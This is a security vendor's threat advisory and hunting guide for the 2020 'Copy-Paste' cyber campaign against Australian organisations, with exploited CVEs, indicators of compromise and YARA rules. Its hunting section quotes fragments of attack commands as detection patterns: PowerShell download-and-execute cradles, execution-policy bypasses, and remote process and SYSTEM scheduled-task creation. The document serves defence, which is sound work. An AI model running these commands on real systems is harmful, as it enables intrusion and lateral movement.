Summary
Australian Prime Minister Australian Prime Minister Scott Morrison announced today that multiple Australian public and private organizations are being urged to safeguard their technology networks, as the country comes under a major cyber-attack. He further stated that all levels of government and the private sectors are being targeted in a "Sophisticated State-based" cyber-attack.
Trustwave has received the known IOCs, and CVEs from the Australian Cyber Security Centre. We have commenced hunting for these IOCs throughout our global Fusion customer base. We are proactively devising new detection logic to identify behavioral elements of this threat. Any detection will be escalated and supported via our standard engagement methods.
Additional updates will be provided tomorrow. Interim advisories will be released when significant changes are tracked as they relate to this threat.
Initial analysis of the intel
The actor was identified actively using publicly available exploit codes, proof of concepts, web shells and other open source offense tools, which can be used to gain privilege access on the target system. The heavy use of pre-existing tools and exploits earned this threat actor the title of "Copy-Paste".
These tools were used against publicly facing infrastructure, primarily focusing on unpatched web services that then lead to Remote Code Execution (RCE). The targeted platforms were Telerik, Microsoft IIS, SharePoint, and Citrix.
The threat actor conducted reconnaissance against the targets, identifying any unpatched services running in the environment. Where RCE was not possible, the actor used various other techniques to gain privileged access on the internet facing systems and internal machines as required.
The threat actor also used various spear-phishing campaigns on targets where the previously mentioned techniques were unsuccessful. The spear-phishing techniques included credential harvesting, emails with malicious attachments, OAuth token grabbing and email tracking services.
The treat actor actively leveraged stolen credentials and compromised Australian legitimate websites to host command and controls (C2) to avoid geo-blocking defenses of target organizations and therefore masquerade their activity as legitimate traffic.
Trustwave Actions:
- Trustwave Security Operations Centre (SOC) is exercising extra vigilance in monitoring IoC related traffic.
- Trustwave Managed Firewalls will have changes made to block the relevant IPs under the known bad actors (KBA).
- Trustwave will monitor Cyber technology vendors and apply relevant policy updates as they are released.
Trustwave Recommendations:
Trustwave urges all customers to take appropriate actions to minimize cybersecurity risk. Below are the recommendations in reference to the observed attack. IoCs are available at the end of this post.
- Raise security awareness of all staff and contractors to identify and report SPAM & phishing emails.
- Block Indicators of Compromise (IoC) as per the attachment, such as IP addresses, email addresses, hash values, at various levels that are applicable to your environment.
- Address the following vulnerabilities on your internal hosts as they are being actively exploited in the wild:
- Exploitation of Telerik UI CVE-2019-18935
- Exploitation of Citrix Products CVE-2019-19781
- Exploitation of Microsoft SharePoint CVE-2019-0604
- Review privileged accounts within your organization.
- Alert your internal security operations team to exercise extra vigilance.
- Review the ACSC Advisory and take appropriate actions relevant to your environment.
- Require periodic password change policies and implement MFA (multi-factor authentication) where appropriate
- Implementation of Brand monitoring services to alert for an organization’s sensitive data leaks/sale
Trustwave Hunting Strategy:
Trustwave SpiderLabs Threat Fusion Team internally strategies and prepares threat hunting plans for all significant global cyber events. We use this exercise to drive our hunt operations for our Managed Security clients. Based on the Australian prime minister's comments on 19 June, 2020 and the unprecedented nature of this attack, SpiderLabs is taking the extraordinary step of sharing our internal threat hunt plan for the Copy-Paste threat actor. All organisations can undertake similar operations within their own environment, or contact Trustwave about engaging professional hunt.
Indicators of Compromise:
Important notes prior starting the hunt:
- Threat actor used publicly available exploit code
- Telerik CVE-2019-18935
- Citrix CVE-2019-19781
- Microsoft SharePoint CVE-2019-0604
- Spear-phishing campaign
- web shells
- PowerShell reverse shell
- PowerShell empire
- HTTPotato (hot potato)
Usage of publicly available exploit codes:
- Telerik CVE-2019-18935
- Search for the URI “Telerik.Web.UI.WebResource.axd?type=rau”
- Search for the file “sleep*.dll”, “rev_shell*.dll”
- Network Connections from w3wp.exe
- YARA rules available at the appendix
- Citrix CVE-2019-19781
- Search for URI “/vpns/portal/”
- Might contain junk codes like this /vpns/portal/<malicious_code>
- Look for unusual XML files from below filesystem (random filename)
- /netscaler/portal/templates
- /var/tmp/netscaler/portal/templates
- Look for possible webshells
- var/vpn/themes/admin.php
- var/vpn/themes/default/default.php
- Microsoft SharePoint CVE-2019-0604
- Search for URI
- “Picker.aspx?PickerDialogType=Microsoft.SharePoint" – Investigate the header “ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData” for shellcode
- Search for URI “/_layouts/15/ua.aspx” – possible web shell
Spear-Phishing Campaign:
- Search for the file “Thesis Information to be referenced from.ppt”
- Activities from domain
- mailguardonline[.]net
- cybersecuritiesinc[.]net
Web Shells:
- Since the attacker is using publicly available web shells from Github, security controls have detected them for the most part.
- Look for below extension in the URI
PowerShell reverse Shell:
- Search in command line
- exe –exec bypass –c
- exe -WindowStyle hidden -ExecutionPolicy Bypass
- exe "IEX (New-ObjectNet.WebClient).DownloadString
- Search YARA rules mentioned below
Credential Access:
Lateral Movement:
- command line
- wmic /node:*process call create -> Creates remote process
- schtasks /create /tn * /tr * /RU System -> run task with SYSTEM user
- Look for Scheduled task running as SYSTEM user
YARA Rules:
YARA Rule for Juicypotato LPE
rule juicypotato_LPE:LPE
{
meta:
author = "SpiderLabs"
group = "copy_paste"
filetype = "exe_dll"
strings:
$str1 = "JuicyPotato" nocase wide ascii
$str2 = "4991d34b-80a1-4291-83b6-3328366b9097" nocase wide ascii
$str3 = "JuicyPotato.pdb" nocase wide ascii
$str4 = "Waiting for auth" nocase wide ascii
condition:
(uint16(0) == 0x5A4D) and 3 of ($str*) and filesize < 500KB
}
YARA Rule for Juicypotato LPE_DLL
rule juicypotato_LPE_DLL:LPE
{
meta:
author = "SpiderLabs"
group = "copy_paste"
filetype = "exe_dll"
strings:
$str1 = "Potato.dll" nocase wide ascii
$str2 = "VirusDeleted" nocase wide ascii
$str3 = "Page404r" nocase wide ascii
condition:
(uint16(0) == 0x5A4D) and all of them and filesize < 200KB
}
YARA Rule for CVE-2019-18935 reverse_shell
rule CVE_2019_18935_reverse_shell:CVE
{
meta:
author = "SpiderLabs"
group = "copy_paste"
filetype = "exe_dll"
strings:
$str1 = "rev_shell_" nocase wide ascii
$str2 = "operator<=>" nocase wide ascii
$str3 = "operator co_await" nocase wide ascii
condition:
(uint16(0) == 0x5A4D) and all of them and filesize < 150KB
}
YARA Rule for malicious macros
rule macros:phishing
{
meta:
author = "SpiderLabs"
group = "copy_paste"
filetype = "macros_VBA"
strings:
$str1 = "\\Microsoft\\Word\\STARTUP\\Template.dotm" nocase wide ascii
$str2 = "bin.hex" nocase wide ascii
$str3 = "ALL = ALL0 + ALL1 + ALL2" nocase wide ascii
$str4 = "504b" nocase wide ascii
condition:
all of them and filesize < 150KB
}
YARA Rule for HTTPCore PowerShell script
rule powershell_httpcore:rev_shell
{
meta:
author = "SpiderLabs"
group = "copy_paste"
filetype = "powershell_script"
strings:
$str1 = "HttpCore.Agent" nocase wide ascii
$con1 = "RootPath =" nocase wide ascii
$con2 = "RemotePassword =" nocase wide ascii
$con3= "RemoteLangType = " nocase wide ascii
$con4 = "Url =" nocase wide ascii
condition:
$str1 and 2 of ($con*) and filesize < 150KB
}
YARA Rule for PowerShell Reverse Shell
rule powershell_rev_shell:rev_shell
{
meta:
author = "SpiderLabs"
group = "copy_paste"
filetype = "Powershell_script"
strings:
$str1 = "(pwd).Path" nocase wide ascii
$con1 = "bytes = 0..65535" nocase wide ascii
$con2 = "sendback =" nocase wide ascii
$con3= "sendbyte = " nocase wide ascii
$con4 = "client =" nocase wide ascii
$con5 = "stream =" nocase wide ascii
condition:
$str1 and 4 of ($con*) and filesize < 150KB
}
YARA Rule for HTTPCore backdoor
rule HTTPcore_rev_shell:rev_shell
{
meta:
author = "SpiderLabs"
group = "copy_paste"
filetype = "exe_dll"
strings:
$str1 = "HttpCore.dll" nocase wide ascii
$con1 = "RootPath" nocase wide ascii
$con2 = "RemotePassword" nocase wide ascii
$con3 = "RemoteLangType" nocase wide ascii
$con4 = "CurrentPassword" nocase wide ascii
condition:
(uint16(0) == 0x5A4D) and all of them and filesize < 150KB
}
YARA Rule for Downloader
rule Downloader
{
meta:
author = "SpiderLabs"
group = "copy_paste"
filetype = "exe_dll"
strings:
$str1 = "\\obj\\Release\\Library.pdb" nocase wide ascii
$con1 = "https://api.onedrive.com/v1.0/shares/s" nocase wide ascii
$con2 = "Microsoft SkyDriveSync" nocase wide ascii
condition:
(uint16(0) == 0x5A4D) and all of them and filesize < 200KB
}
YARA Rule for awen asp webshell
rule awen_asp_webshell:webshell
{
meta:
author = "SpiderLabs"
group = "copy_paste"
filetype = "aspx_webshell"
strings:
$str1 = "awen asp.net webshell" nocase wide ascii
$con1 = "cmdExe_Click" nocase wide ascii
condition:
all of them and filesize < 100KB
}
YARA Rule for HighShell Aspx webshell
rule HighShell_aspx:webshell
{
meta:
author = "SpiderLabs"
group = "copy_paste"
filetype = "aspx_webshell"
strings:
$str1 = "pro"
$str2 = "cmd"
$str3 = "sav"
$str4 = "vir"
$str5 = "J3ugYdknpax1ZbHB2QILB5NS6dVa0iUD0mhhBPv0Srw="
$str6 = {22 63 6d 64 2e 65 78 65 22 3a 70 72 6f}
condition:
all of them and filesize < 150KB
}
